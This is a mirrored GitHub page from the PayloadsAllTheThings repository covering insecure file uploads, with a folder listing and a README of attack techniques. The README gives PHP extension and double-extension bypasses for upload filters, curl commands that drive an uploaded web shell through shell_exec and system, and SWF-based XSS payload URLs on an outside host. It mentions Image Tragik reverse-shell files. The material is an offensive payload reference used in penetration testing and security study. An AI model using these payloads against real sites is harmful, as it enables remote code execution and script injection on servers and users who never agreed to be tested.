Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-07-03 08:58:17 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
88d5af0b19
PayloadsAllTheThings/Upload insecure files
History
Vladislav Nechakhin 90db8b0f11 Update exif_imagetype bypass
2019-02-07 14:59:22 +07:00
..
Busybox httpd.conf Update httpd.conf 2018-12-14 00:03:50 +00:00
Eicar XSS Intruder + Eicar + SSRF http://0 2017-07-30 13:17:00 +02:00
Ffmpeg HLS FFMpeg injection - Bypass and explanation 2017-06-28 22:45:36 +02:00
IIS MySQL - Code exec 2017-11-09 09:05:50 +01:00
IIS Web Config Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 12:04:55 +02:00
Image Tragik Payloads - Quick fix 2018-02-23 13:48:51 +01:00
Image Tragik 2 Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00
Insecure Flash More payloads for XSS/SQL/LFI/Upload and XXE 2017-06-04 17:22:26 +02:00
JPG Resize Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Metadata GIF More payloads for XSS/SQL/LFI/Upload and XXE 2017-06-04 17:22:26 +02:00
Metadata PNG More payloads for XSS/SQL/LFI/Upload and XXE 2017-06-04 17:22:26 +02:00
PDF JS PDF JS 2018-09-06 20:28:30 +02:00
PHP .htaccess Update exif_imagetype bypass 2019-02-07 14:59:22 +07:00
PHP Extension MSSQL union based + Windows Runas 2019-01-20 16:41:46 +01:00
PNG Resize Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Python __init__.py Use octal numbers that work in both Python 2 and 3 2018-09-02 14:09:55 +02:00
Server Side Include JWT JSON Web Token + SSI files 2018-10-29 22:22:10 +01:00
ZIP Symbolic Link Reverse Shell Cheatsheet 2017-08-03 21:35:43 +02:00
README.md Bugfix - Errors in stashed changes 2019-01-28 20:27:45 +01:00

README.md

Upload

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Exploits

Image Tragik

HTTP Request
Reverse Shell
Touch command

PHP Extension

.php

Less known extension
.pht
.pgif
.phtml
.shtml

Double extension
.jpeg.php
.png.php

PNG Bypass a resize

Upload the picture and use a local file inclusion

You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"

JPG Bypass a resize

Upload the picture and use a local file inclusion

http://localhost/test.php?c=ls

XSS via SWF

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(?js=history.go(-1),_self);}

IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvalidfileinvalidfile,target);setTimeout(alert(w.document.location);w.close();,1);

.htaccess

An .htaccess file is a way to configure the details of your website without needed to alter the server config files.

References

  • Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil